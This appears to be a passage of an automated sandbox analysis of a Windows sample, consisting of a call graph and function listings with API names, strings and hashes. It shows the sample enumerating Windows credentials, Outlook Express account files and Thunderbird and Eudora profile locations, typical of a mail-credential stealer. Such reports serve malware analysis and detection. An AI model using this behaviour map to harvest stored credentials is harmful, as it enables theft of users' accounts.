409d54 ??2@YAPAXI 33248->33250 33253 409d8b 33248->33253 33249 408db6 12 API calls 33249->33252 33250->33253 33252->33247 33252->33248 33252->33249 33253->33253 33266 409b9c 33253->33266 33255 4023c1 33255->33156 33257 409a44 33256->33257 33258 409a3d ??3@YAXPAX 33256->33258 33259 409a52 33257->33259 33260 409a4b ??3@YAXPAX 33257->33260 33258->33257 33261 409a63 33259->33261 33262 409a5c ??3@YAXPAX 33259->33262 33260->33259 33263 409a83 ??2@YAPAXI ??2@YAPAXI 33261->33263 33264 409a73 ??3@YAXPAX 33261->33264 33265 409a7c ??3@YAXPAX 33261->33265 33262->33261 33263->33247 33264->33265 33265->33263 33267 407a55 ??3@YAXPAX 33266->33267 33268 409ba5 33267->33268 33269 407a55 ??3@YAXPAX 33268->33269 33270 409bad 33269->33270 33271 407a55 ??3@YAXPAX 33270->33271 33272 409bb5 33271->33272 33273 407a55 ??3@YAXPAX 33272->33273 33274 409bbd 33273->33274 33275 407a1f 4 API calls 33274->33275 33276 409bd0 33275->33276 33277 407a1f 4 API calls 33276->33277 33278 409bda 33277->33278 33279 407a1f 4 API calls 33278->33279 33280 409be4 33279->33280 33281 407a1f 4 API calls 33280->33281 33282 409bee 33281->33282 33282->33255 33284 410d0e 2 API calls 33283->33284 33285 410dca 33284->33285 33286 410dfd memset 33285->33286 33325 4070ae 33285->33325 33287 410e1d 33286->33287 33328 410a9c RegOpenKeyExA 33287->33328 33291 401e9e strlen strlen 33291->33159 33291->33160 33292 410e4a 33293 410e7f _mbscpy 33292->33293 33329 410d3d _mbscpy 33292->33329 33293->33291 33295 410e5b 33330 410add RegQueryValueExA 33295->33330 33297 410e73 RegCloseKey 33297->33293 33298->33163 33299->33169 33331 410a9c RegOpenKeyExA 33300->33331 33302 401c4c 33303 401cad 33302->33303 33332 410add RegQueryValueExA 33302->33332 33303->33172 33303->33174 33305 401c6a 33306 401c71 strchr 33305->33306 33307 401ca4 RegCloseKey 33305->33307 33306->33307 33308 401c85 strchr 33306->33308 33307->33303 33308->33307 33309 401c94 33308->33309 33333 406f06 strlen 33309->33333 33311 401ca1 33311->33307 33312->33175 33313->33160 33314->33166 33315->33192 33336 410a9c RegOpenKeyExA 33316->33336 33318 410b34 33319 410b5d 33318->33319 33337 410add RegQueryValueExA 33318->33337 33319->33192 33321 410b4c RegCloseKey 33321->33319 33323->33192 33324->33180 33326 4070bd GetVersionExA 33325->33326 33327 4070ce 33325->33327 33326->33327 33327->33286 33327->33291 33328->33292 33329->33295 33330->33297 33331->33302 33332->33305 33334 406f17 33333->33334 33335 406f1a memcpy 33333->33335 33334->33335 33335->33311 33336->33318 33337->33321 33339 409b40 33338->33339 33341 409b4e 33338->33341 33346 409901 memset SendMessageA 33339->33346 33342 409b99 33341->33342 33343 409b8b 33341->33343 33342->33204 33347 409868 SendMessageA 33343->33347 33345->33200 33346->33341 33347->33342 33348->33207 33350 404785 FreeLibrary 33349->33350 33351 40473b LoadLibraryA 33350->33351 33352 40474c GetProcAddress 33351->33352 33353 40476e 33351->33353 33352->33353 33354 404764 33352->33354 33355 404781 33353->33355 33356 404785 FreeLibrary 33353->33356 33354->33353 33355->33210 33356->33355 33358 4107f1 FreeLibrary 33357->33358 33359 403c30 LoadLibraryA 33358->33359 33360 403c74 33359->33360 33361 403c44 GetProcAddress 33359->33361 33362 4107f1 FreeLibrary 33360->33362 33361->33360 33363 403c5e 33361->33363 33364 403c7b 33362->33364 33363->33360 33366 403c6b 33363->33366 33365 404734 3 API calls 33364->33365 33367 403c86 33365->33367 33366->33364 33441 4036e5 33367->33441 33370 4036e5 26 API calls 33371 403c9a 33370->33371 33372 4036e5 26 API calls 33371->33372 33373 403ca4 33372->33373 33374 4036e5 26 API calls 33373->33374 33375 403cae 33374->33375 33453 4085d2 33375->33453 33383 403ce5 33384 403cf7 33383->33384 33636 402bd1 39 API calls 33383->33636 33501 410a9c RegOpenKeyExA 33384->33501 33387 403d0a 33388 403d1c 33387->33388 33637 402bd1 39 API calls 33387->33637 33502 402c5d 33388->33502 33392 4070ae GetVersionExA 33393 403d31 33392->33393 33520 410a9c RegOpenKeyExA 33393->33520 33395 403d51 33396 403d61 33395->33396 33638 402b22 46 API calls 33395->33638 33521 410a9c RegOpenKeyExA 33396->33521 33399 403d87 33400 403d97 33399->33400 33639 402b22 46 API calls 33399->33639 33522 410a9c RegOpenKeyExA 33400->33522 33403 403dbd 33404 403dcd 33403->33404 33640 402b22 46 API calls 33403->33640 33523 410808 33404->33523 33408 404785 FreeLibrary 33409 403de8 33408->33409 33527 402fdb 33409->33527 33412 402fdb 34 API calls 33413 403e00 33412->33413 33543 4032b7 33413->33543 33422 403e3b 33424 403e73 33422->33424 33425 403e46 _mbscpy 33422->33425 33590 40fb00 33424->33590 33642 40f334 334 API calls 33425->33642 33434 4047a3 33433->33434 33435 404799 FreeLibrary 33433->33435 33434->33210 33435->33434 33436->33210 33438 410807 33437->33438 33439 4107fc FreeLibrary 33437->33439 33438->33210 33439->33438 33440->33209 33442 4037c5 33441->33442 33443 4036fb 33441->33443 33442->33370 33643 410863 UuidFromStringA UuidFromStringA memcpy 33443->33643 33445 40370e 33445->33442 33446 403716 strchr 33445->33446 33446->33442 33447 403730 33446->33447 33644 4021b6 memset 33447->33644 33449 40373f _mbscpy _mbscpy strlen 33450 4037a4 _mbscpy 33449->33450 33451 403789 sprintf 33449->33451 33645 4023e5 16 API calls 33450->33645 33451->33450 33454 4085e2 33453->33454 33646 4082cd 11 API calls 33454->33646 33458 408600 33459 403cba 33458->33459 33460 40860b memset 33458->33460 33471 40821d 33459->33471 33649 410b62 RegEnumKeyExA 33460->33649 33462 4086d2 RegCloseKey 33462->33459 33464 408637 33464->33462 33465 40865c memset 33464->33465 33650 410a9c RegOpenKeyExA 33464->33650 33653 410b62 RegEnumKeyExA 33464->33653 33651 410add RegQueryValueExA 33465->33651 33468 408694 33652 40848b 10 API calls 33468->33652 33470 4086ab RegCloseKey 33470->33464 33654 410a9c RegOpenKeyExA 33471->33654 33473 40823f 33474 403cc6 33473->33474 33475 408246 memset 33473->33475 33483 4086e0 33474->33483 33655 410b62 RegEnumKeyExA 33475->33655 33477 4082bf RegCloseKey 33477->33474 33479 40826f 33479->33477 33656 410a9c RegOpenKeyExA 33479->33656 33657 4080ed 11 API calls 33479->33657 33658 410b62 RegEnumKeyExA 33479->33658 33482 4082a2 RegCloseKey 33482->33479 33659 4045db 33483->33659 33486 4088ef 33667 404656 33486->33667 33488 40872d 33488->33486 33491 408737 wcslen 33488->33491 33490 40872b CredEnumerateW 33490->33488 33491->33486 33494 40876a 33491->33494 33492 40877a _wcsncoll 33492->33494 33494->33486 33494->33492 33495 404734 3 API calls 33494->33495 33496 404785 FreeLibrary 33494->33496 33497 408812 memset 33494->33497 33498 40883c memcpy wcschr 33494->33498 33499 4088c3 LocalFree 33494->33499 33670 40466b _mbscpy 33494->33670 33495->33494 33496->33494 33497->33494 33497->33498 33498->33494 33499->33494 33500 410a9c RegOpenKeyExA 33500->33383 33501->33387 33671 410a9c RegOpenKeyExA 33502->33671 33504 402c7a 33505 402da5 33504->33505 33506 402c87 memset 33504->33506 33505->33392 33672 410b62 RegEnumKeyExA 33506->33672 33508 402d9c RegCloseKey 33508->33505 33509 410b1e 3 API calls 33510 402ce4 memset sprintf 33509->33510 33673 410a9c RegOpenKeyExA 33510->33673 33512 402d28 33513 402d3a sprintf 33512->33513 33674 402bd1 39 API calls 33512->33674 33675 410a9c RegOpenKeyExA 33513->33675 33518 402cb2 33518->33508 33518->33509 33519 402d9a 33518->33519 33676 402bd1 39 API calls 33518->33676 33677 410b62 RegEnumKeyExA 33518->33677 33519->33508 33520->33395 33521->33399 33522->33403 33524 410816 33523->33524 33525 4107f1 FreeLibrary 33524->33525 33526 403ddd 33525->33526 33526->33408 33678 410a9c RegOpenKeyExA 33527->33678 33529 402ff9 33530 403006 memset 33529->33530 33531 40312c 33529->33531 33679 410b62 RegEnumKeyExA 33530->33679 33531->33412 33533 403033 33534 403122 RegCloseKey 33533->33534 33535 410b1e 3 API calls 33533->33535 33538 4030a2 memset 33533->33538 33540 410b62 RegEnumKeyExA 33533->33540 33541 4030f9 RegCloseKey 33533->33541 33682 402db3 26 API calls 33533->33682 33534->33531 33536 403058 memset sprintf 33535->33536 33680 410a9c RegOpenKeyExA 33536->33680 33681 410b62 RegEnumKeyExA 33538->33681 33540->33533 33541->33533 33544 4032d5 33543->33544 33545 4033a9 33543->33545 33683 4021b6 memset 33544->33683 33558 4034e4 memset memset 33545->33558 33547 4032e1 33684 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33547->33684 33549 4032ea 33550 4032f8 memset GetPrivateProfileSectionA 33549->33550 33685 4023e5 16 API calls 33549->33685 33550->33545 33555 40332f 33550->33555 33552 40339b strlen 33552->33545 33552->33555 33554 403350 strchr 33554->33555 33555->33545 33555->33552 33686 4021b6 memset 33555->33686 33687 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33555->33687 33688 4023e5 16 API calls 33555->33688 33559 410b1e 3 API calls 33558->33559 33560 40353f 33559->33560 33561 40357f 33560->33561 33562 403546 _mbscpy 33560->33562 33566 403985 33561->33566 33689 406d55 strlen _mbscat 33562->33689 33564 403565 _mbscat 33690 4033f0 19 API calls 33564->33690 33691 40466b _mbscpy 33566->33691 33570 4039aa 33572 4039ff 33570->33572 33692 40f460 memset memset 33570->33692 33713 40f6e2 33570->33713 33729 4038e8 21 API calls 33570->33729 33573 404785 FreeLibrary 33572->33573 33574 403a0b 33573->33574 33575 4037ca memset memset 33574->33575 33737 444551 memset 33575->33737 33578 4038e2 33578->33422 33641 40f334 334 API calls 33578->33641 33580 40382e 33581 406f06 2 API calls 33580->33581 33582 403843 33581->33582 33583 406f06 2 API calls 33582->33583 33584 403855 strchr 33583->33584 33585 403884 _mbscpy 33584->33585 33586 403897 strlen 33584->33586 33587 4038bf _mbscpy 33585->33587 33586->33587 33588 4038a4 sprintf 33586->33588 33749 4023e5 16 API calls 33587->33749 33588->33587 33591 44b090 33590->33591 33592 40fb10 RegOpenKeyExA 33591->33592 33593 403e7f 33592->33593 33594 40fb3b RegOpenKeyExA 33592->33594 33604 40f96c 33593->33604 33595 40fb55 RegQueryValueExA 33594->33595 33596 40fc2d RegCloseKey 33594->33596 33597 40fc23 RegCloseKey 33595->33597 33598 40fb84 33595->33598 33596->33593 33597->33596 33599 404734 3 API calls 33598->33599 33600 40fb91 33599->33600 33600->33597 33601 40fc19 LocalFree 33600->33601 33602 40fbdd memcpy memcpy 33600->33602 33601->33597 33754 40f802 11 API calls 33602->33754 33605 4070ae GetVersionExA 33604->33605 33606 40f98d 33605->33606 33607 4045db 7 API calls 33606->33607 33611 40f9a9 33607->33611 33608 40fae6 33609 404656 FreeLibrary 33608->33609 33610 403e85 33609->33610 33616 4442ea memset 33610->33616 33611->33608 33612 40fa13 memset WideCharToMultiByte 33611->33612 33612->33611 33613 40fa43 _strnicmp 33612->33613 33613->33611 33614 40fa5b WideCharToMultiByte 33613->33614 33614->33611 33615 40fa88 WideCharToMultiByte 33614->33615 33615->33611 33617 410dbb 9 API calls 33616->33617 33618 444329 33617->33618 33755 40759e strlen strlen 33618->33755 33623 410dbb 9 API calls 33624 444350 33623->33624 33625 40759e 3 API calls 33624->33625 33626 44435a 33625->33626 33627 444212 65 API calls 33626->33627 33628 444366 memset memset 33627->33628 33629 410b1e 3 API calls 33628->33629 33630 4443b9 ExpandEnvironmentStringsA strlen 33629->33630 33631 4443f4 _strcmpi 33630->33631 33632 4443e5 33630->33632 33633 403e91 33631->33633 33634 44440c 33631->33634 33632->33631 33633->33210 33635 444212 65 API calls 33634->33635 33635->33633 33636->33384 33637->33388 33638->33396 33639->33400 33640->33404 33641->33422 33642->33424 33643->33445 33644->33449 33645->33442 33647 40841c 33646->33647 33648 410a9c RegOpenKeyExA 33647->33648 33648->33458 33649->33464 33650->33464 33651->33468 33652->33470 33653->33464 33654->33473 33655->33479 33656->33479 33657->33482 33658->33479 33660 404656 FreeLibrary 33659->33660 33661 4045e3 LoadLibraryA 33660->33661 33662 404651 33661->33662 33663 4045f4 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 33661->33663 33662->33486 33662->33488 33662->33490 33664 40463d 33663->33664 33665 404656 FreeLibrary 33664->33665 33666 404643 33664->33666 33665->33662 33666->33662 33668 403cd2 33667->33668 33669 40465c FreeLibrary 33667->33669 33668->33500 33669->33668 33670->33494 33671->33504 33672->33518 33673->33512 33674->33513 33675->33518 33676->33518 33677->33518 33678->33529 33679->33533 33680->33533 33681->33533 33682->33533 33683->33547 33684->33549 33685->33550 33686->33554 33687->33555 33688->33555 33689->33564 33690->33561 33691->33570 33730 4078ba 33692->33730 33695 4078ba _mbsnbcat 33696 40f5a3 RegOpenKeyExA 33695->33696 33697 40f5c3 RegQueryValueExA 33696->33697 33698 40f6d9 33696->33698 33699 40f6d0 RegCloseKey 33697->33699 33700 40f5f0 33697->33700 33698->33570 33699->33698 33700->33699 33710 40f675 33700->33710 33734 40466b _mbscpy 33700->33734 33702 40f611 33704 404734 3 API calls 33702->33704 33709 40f616 33704->33709 33705 40f69e RegQueryValueExA 33705->33699 33706 40f6c1 33705->33706 33706->33699 33707 40f66a 33708 404785 FreeLibrary 33707->33708 33708->33710 33709->33707 33711 40f661 LocalFree 33709->33711 33712 40f645 memcpy 33709->33712 33710->33699 33735 4012ee strlen 33710->33735 33711->33707 33712->33711 33736 40466b _mbscpy 33713->33736 33715 40f6fa 33716 4045db 7 API calls 33715->33716 33717 40f708 33716->33717 33718 404734 3 API calls 33717->33718 33724 40f7e2 33717->33724 33720 40f715 33718->33720 33719 404656 FreeLibrary 33721 40f7f1 33719->33721 33720->33724 33725 40f797 WideCharToMultiByte 33720->33725 33722 404785 FreeLibrary 33721->33722 33723 40f7fc 33722->33723 33723->33570 33724->33719 33726 40f7b8 strlen 33725->33726 33727 40f7d9 LocalFree 33725->33727 33726->33727 33728 40f7c8 _mbscpy 33726->33728 33727->33724 33728->33727 33729->33570 33731 4078e6 33730->33731 33732 4078c7 _mbsnbcat 33731->33732 33733 4078ea 33731->33733 33732->33731 33733->33695 33734->33702 33735->33705 33736->33715 33750 410a9c RegOpenKeyExA 33737->33750 33739 40381a 33739->33578 33748 4021b6 memset 33739->33748 33740 44458b 33740->33739 33751 410add RegQueryValueExA 33740->33751 33742 4445a4 33743 4445dc RegCloseKey 33742->33743 33752 410add RegQueryValueExA 33742->33752 33743->33739 33745 4445c1 33745->33743 33753 444879 30 API calls 33745->33753 33747 4445da 33747->33743 33748->33580 33749->33578 33750->33740 33751->33742 33752->33745 33753->33747 33754->33601 33756 4075c9 33755->33756 33757 4075bb _mbscat 33755->33757 33758 444212 33756->33758 33757->33756 33775 407e9d 33758->33775 33761 44424d 33762 444274 33761->33762 33764 444258 33761->33764 33783 407ef8 33761->33783 33763 407e9d 9 API calls 33762->33763 33772 4442a0 33763->33772 33796 444196 52 API calls 33764->33796 33766 407ef8 9 API calls 33766->33772 33767 4442ce 33793 407f90 33767->33793 33771 407f90 FindClose 33773 4442e4 33771->33773 33772->33766 33772->33767 33774 444212 65 API calls 33772->33774 33797 407e62 strcmp strcmp 33772->33797 33773->33623 33774->33772 33776 407f90 FindClose 33775->33776 33777 407eaa 33776->33777 33778 406f06 2 API calls 33777->33778 33779 407ebd strlen strlen 33778->33779 33780 407ee1 33779->33780 33782 407eea 33779->33782 33798 4070e3 strlen _mbscat _mbscpy _mbscat 33780->33798 33782->33761 33784 407f03 FindFirstFileA 33783->33784 33785 407f24 FindNextFileA 33783->33785 33786 407f3f 33784->33786 33787 407f46 strlen strlen 33785->33787 33788 407f3a 33785->33788 33786->33787 33790 407f7f 33786->33790 33787->33790 33791 407f76 33787->33791 33789 407f90 FindClose 33788->33789 33789->33786 33790->33761 33799 4070e3 strlen _mbscat _mbscpy _mbscat 33791->33799 33794 407fa3 33793->33794 33795 407f99 FindClose 33793->33795 33794->33771 33795->33794 33796->33761 33797->33772 33798->33782 33799->33790 33800->33223 33801->33227 33802->33234 33803->33233 33804->33240 33805->33237 33806->33232 33815 411853 RtlInitializeCriticalSection memset 33816 401455 ExitProcess GetWindowLongA SetWindowLongA EnumChildWindows EnumChildWindows 33989 40a256 13 API calls 33991 432e5b 17 API calls 33993 43fa5a 20 API calls 33818 401060 41 API calls 33996 427260 CloseHandle memset memset 32916 410c68 FindResourceA 32917 410c81 SizeofResource 32916->32917 32920 410cae 32916->32920 32918 410c92 LoadResource 32917->32918 32917->32920 32919 410ca0 LockResource 32918->32919 32918->32920 32919->32920 33998 405e69 14 API calls 33823 433068 15 API calls __fprintf_l 34000 414a6d 18 API calls 34001 43fe6f 134 API calls 33825 424c6d 15 API calls __fprintf_l 34002 426741 19 API calls 33827 440c70 17 API calls 33828 443c71 44 API calls 33831 427c79 24 API calls 34005 416e7e memset __fprintf_l 33835 42800b 47 API calls 33836 425115 82 API calls __fprintf_l 34008 41960c 61 API calls 33837 43f40c 122 API calls __fprintf_l 33840 411814 InterlockedCompareExchange RtlDeleteCriticalSection 33841 43f81a 20 API calls 33843 414c20 memset memset 33844 410c22 memset _itoa WritePrivateProfileStringA GetPrivateProfileIntA 34012 414625 18 API calls 34013 404225 modf 34014 403a26 strlen WriteFile 34016 40422a 12 API calls 34020 427632 memset memset memcpy 34021 40ca30 59 API calls 32903 44b435 VirtualProtect 32904 44b444 VirtualProtect 32903->32904 32905 44b454 32903->32905 32904->32905 34022 404235 26 API calls 33846 425115 76 API calls __fprintf_l 34023 425115 77 API calls __fprintf_l 34025 44223a 38 API calls 33852 43183c 112 API calls 34026 44b2c5 _onexit __dllonexit 34031 42a6d2 memcpy __allrem 33854 405cda 65 API calls 34039 43fedc 138 API calls 34040 4116e1 16 API calls __fprintf_l 33857 4244e6 19 API calls 33859 42e8e8 127 API calls __fprintf_l 33860 4118ee RtlLeaveCriticalSection 34045 43f6ec 22 API calls 33862 425115 119 API calls __fprintf_l 32906 410cf3 EnumResourceNamesA 34048 4492f0 memcpy memcpy 34050 43fafa 18 API calls 34052 4342f9 15 API calls __fprintf_l 33863 4144fd 19 API calls 34054 4016fd NtdllDefWindowProc_A ??2@YAPAXI memset memcpy ??3@YAXPAX 34055 40b2fe LoadIconA LoadIconA SendMessageA SendMessageA SendMessageA 34058 443a84 _mbscpy 34060 43f681 17 API calls 33866 404487 22 API calls 34062 415e8c 16 API calls __fprintf_l 33870 411893 RtlDeleteCriticalSection __fprintf_l 33871 41a492 42 API calls 34066 403e96 34 API calls 34067 410e98 memset SHGetPathFromIDList SendMessageA 33873 426741 109 API calls __fprintf_l 33874 4344a2 18 API calls 33875 4094a2 10 API calls 34070 4116a6 15 API calls __fprintf_l 34071 43f6a4 17 API calls 34072 440aa3 20 API calls 34074 427430 45 API calls 33878 4090b0 7 API calls 33879 4148b0 15 API calls 33881 4118b4 RtlEnterCriticalSection 33882 4014b7 CreateWindowExA 33883 40c8b8 19 API calls 33885 4118bf RtlTryEnterCriticalSection 34079 42434a 18 API calls __fprintf_l 34081 405f53 12 API calls 33893 43f956 59 API calls 33895 40955a 17 API calls 33896 428561 36 API calls 33897 409164 7 API calls 34085 404366 19 API calls 34089 40176c ExitProcess 34092 410777 42 API calls 33902 40dd7b 51 API calls 33903 425d7c 16 API calls __fprintf_l 34094 43f6f0 25 API calls 34095 42db01 22 API calls 33904 412905 15 API calls __fprintf_l 34096 403b04 54 API calls 34097 405f04 SetDlgItemTextA GetDlgItemTextA 34098 44b301 ??3@YAXPAX 34101 4120ea 14 API calls 3 library calls 34102 40bb0a 8 API calls 34104 413f11 strcmp 33908 434110 17 API calls __fprintf_l 33910 425115 108 API calls __fprintf_l 34105 444b11 _onexit 33912 425115 76 API calls __fprintf_l 33915 429d19 10 API calls 34108 444b1f __dllonexit 34109 409f20 _strcmpi 33917 42b927 31 API calls 34112 433f26 19 API calls __fprintf_l 34113 44b323 FreeLibrary 34114 427f25 46 API calls 34115 43ff2b 17 API calls 34116 43fb30 19 API calls 33924 414d36 16 API calls 33926 40ad38 7 API calls 34118 433b38 16 API calls __fprintf_l 34119 44b33b ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 33930 426741 21 API calls 33931 40c5c3 125 API calls 33933 43fdc5 17 API calls 34120 4117c8 InterlockedCompareExchange RtlInitializeCriticalSection 33936 4161cb memcpy memcpy memcpy memcpy 34125 43ffc8 18 API calls 33937 4281cc 15 API calls __fprintf_l 34127 4383cc 110 API calls __fprintf_l 33938 4275d3 41 API calls 34128 4153d3 22 API calls __fprintf_l 33939 444dd7 _XcptFilter 34133 4013de 15 API calls 34135 425115 111 API calls __fprintf_l 34136 43f7db 18 API calls 34139 410be6 WritePrivateProfileStringA GetPrivateProfileStringA 33942 4335ee 16 API calls __fprintf_l 34141 429fef 11 API calls 33943 444deb _exit _c_exit 34142 40bbf0 138 API calls 33946 425115 79 API calls __fprintf_l 34146 437ffa 22 API calls 33950 4021ff 14 API calls 33951 43f5fc 149 API calls 34147 40e381 9 API calls 33953 405983 40 API calls 33954 42b186 27 API calls __fprintf_l 33955 427d86 76 API calls 33956 403585 20 API calls 33958 42e58e 18 API calls __fprintf_l 33961 425115 75 API calls __fprintf_l 33963 401592 8 API calls 32907 410b92 32910 410a6b 32907->32910 32909 410bb2 32911 410a77 32910->32911 32912 410a89 GetPrivateProfileIntA 32910->32912 32915 410983 memset _itoa WritePrivateProfileStringA 32911->32915 32912->32909 32914 410a84 32914->32909 32915->32914 34151 434395 16 API calls 33965 441d9c memcmp 34153 43f79b 119 API calls 33966 40c599 43 API calls 34154 426741 87 API calls 33970 4401a6 21 API calls 33972 426da6 memcpy memset memset memcpy 33973 4335a5 15 API calls 33975 4299ab memset memset memcpy memset memset 33976 40b1ab 8 API calls 34159 425115 76 API calls __fprintf_l 34163 4113b2 18 API calls 2 library calls 34167 40a3b8 memset sprintf SendMessageA 32921 410bbc 32924 4109cf 32921->32924 32925 4109dc 32924->32925 32926 410a23 memset GetPrivateProfileStringA 32925->32926 32927 4109ea memset 32925->32927 32932 407646 strlen 32926->32932 32937 4075cd sprintf memcpy 32927->32937 32930 410a0c WritePrivateProfileStringA 32931 410a65 32930->32931 32933 40765a 32932->32933 32935 40765c 32932->32935 32933->32931 32934 4076a3 32934->32931 32935->32934 32938 40737c strtoul 32935->32938 32937->32930 32938->32935 33978 40b5bf memset memset _mbsicmp

                                                                                              Executed Functions

                                                                                              Function 004082CD Relevance: 31.6, APIs: 11, Strings: 7, Instructions: 145stringCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 129 4082cd-40841a memset * 4 GetComputerNameA GetUserNameA MultiByteToWideChar * 2 strlen * 2 memcpy 130 408450-408453 129->130 131 40841c 129->131 133 408484-408488 130->133 134 408455-40845e 130->134 132 408422-40842b 131->132 135 408432-40844e 132->135 136 40842d-408431 132->136 137 408460-408464 134->137 138 408465-408482 134->138 135->130 135->132 136->135 137->138 138->133 138->134
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 0040832F
                                                                                              • memset.MSVCRT ref: 00408343
                                                                                              • memset.MSVCRT ref: 0040835F
                                                                                              • memset.MSVCRT ref: 00408376
                                                                                              • GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                                                              • GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                                                              • strlen.MSVCRT ref: 004083E9
                                                                                              • strlen.MSVCRT ref: 004083F8
                                                                                              • memcpy.MSVCRT ref: 0040840A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
                                                                                              • String ID: 5$H$O$b$i$}$}
                                                                                              • API String ID: 1832431107-3760989150
                                                                                              • Opcode ID: dbc5b2c41103eb4c577891d3a58301c7b9bd9d40af4516c3687f3402f5e388bf
                                                                                              • Instruction ID: 30108760c83c1dc53a9521f9e33a2a4701cfdd5ab922e7e2e5f0797d9ff7fddf
                                                                                              • Opcode Fuzzy Hash: dbc5b2c41103eb4c577891d3a58301c7b9bd9d40af4516c3687f3402f5e388bf
                                                                                              • Instruction Fuzzy Hash: BC51F67180029DAEDB11CFA4CC81BEEBBBCEF49314F0441AAE555E7182D7389B45CB65
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00407EF8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58filestringCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 443 407ef8-407f01 444 407f03-407f22 FindFirstFileA 443->444 445 407f24-407f38 FindNextFileA 443->445 446 407f3f-407f44 444->446 447 407f46-407f74 strlen * 2 445->447 448 407f3a call 407f90 445->448 446->447 450 407f89-407f8f 446->450 451 407f83 447->451 452 407f76-407f81 call 4070e3 447->452 448->446 454 407f86-407f88 451->454 452->454 454->450
                                                                                              APIs
                                                                                              • FindFirstFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F0E
                                                                                              • FindNextFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F2C
                                                                                              • strlen.MSVCRT ref: 00407F5C
                                                                                              • strlen.MSVCRT ref: 00407F64
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileFindstrlen$FirstNext
                                                                                              • String ID: ACD
                                                                                              • API String ID: 379999529-620537770
                                                                                              • Opcode ID: 27d5437505665631421f449a56434de01e8b3a886fb5cb3a927ed9b27628f516
                                                                                              • Instruction ID: 71029bc486f6697817f6bb289966da7394398bd7116df025ae0cbd4ece6cffc9
                                                                                              • Opcode Fuzzy Hash: 27d5437505665631421f449a56434de01e8b3a886fb5cb3a927ed9b27628f516
                                                                                              • Instruction Fuzzy Hash: 581170769092029FD354DB34D884ADBB3D8DB45725F100A2FF459D21D1EB38B9408B5A
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00401E69 Relevance: 52.8, APIs: 19, Strings: 11, Instructions: 261stringregistryCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 00401E8B
                                                                                              • strlen.MSVCRT ref: 00401EA4
                                                                                              • strlen.MSVCRT ref: 00401EB2
                                                                                              • strlen.MSVCRT ref: 00401EF8
                                                                                              • strlen.MSVCRT ref: 00401F06
                                                                                              • memset.MSVCRT ref: 00401FB1
                                                                                              • atoi.MSVCRT ref: 00401FE0
                                                                                              • memset.MSVCRT ref: 00402003
                                                                                              • sprintf.MSVCRT ref: 00402030
                                                                                                • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                                              • memset.MSVCRT ref: 00402086
                                                                                              • memset.MSVCRT ref: 0040209B
                                                                                              • strlen.MSVCRT ref: 004020A1
                                                                                              • strlen.MSVCRT ref: 004020AF
                                                                                              • strlen.MSVCRT ref: 004020E2
                                                                                              • strlen.MSVCRT ref: 004020F0
                                                                                              • memset.MSVCRT ref: 00402018
                                                                                                • Part of subcall function 004070E3: _mbscpy.MSVCRT ref: 004070EB
                                                                                                • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                                                              • _mbscpy.MSVCRT ref: 00402177
                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00402181
                                                                                              • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104), ref: 0040219C
                                                                                                • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: strlen$memset$Close_mbscpy$AttributesEnvironmentExpandFileStrings_mbscatatoisprintf
                                                                                              • String ID: %programfiles%\Mozilla Thunderbird$%s\Main$Install Directory$Mozilla\Profiles$Software\Classes\Software\Qualcomm\Eudora\CommandLine\current$Software\Mozilla\Mozilla Thunderbird$Software\Qualcomm\Eudora\CommandLine$Thunderbird\Profiles$current$nss3.dll$sqlite3.dll
                                                                                              • API String ID: 1846531875-4223776976
                                                                                              • Opcode ID: 24cd1edf3e0e6a0f2a794eae778d20d0b8fcf68951756f89e235529ef22c09db
                                                                                              • Instruction ID: 9c65708a615aa9161e76439fb3ec4404e3c7586a7422c94cf2faf2b42662f59f
                                                                                              • Opcode Fuzzy Hash: 24cd1edf3e0e6a0f2a794eae778d20d0b8fcf68951756f89e235529ef22c09db
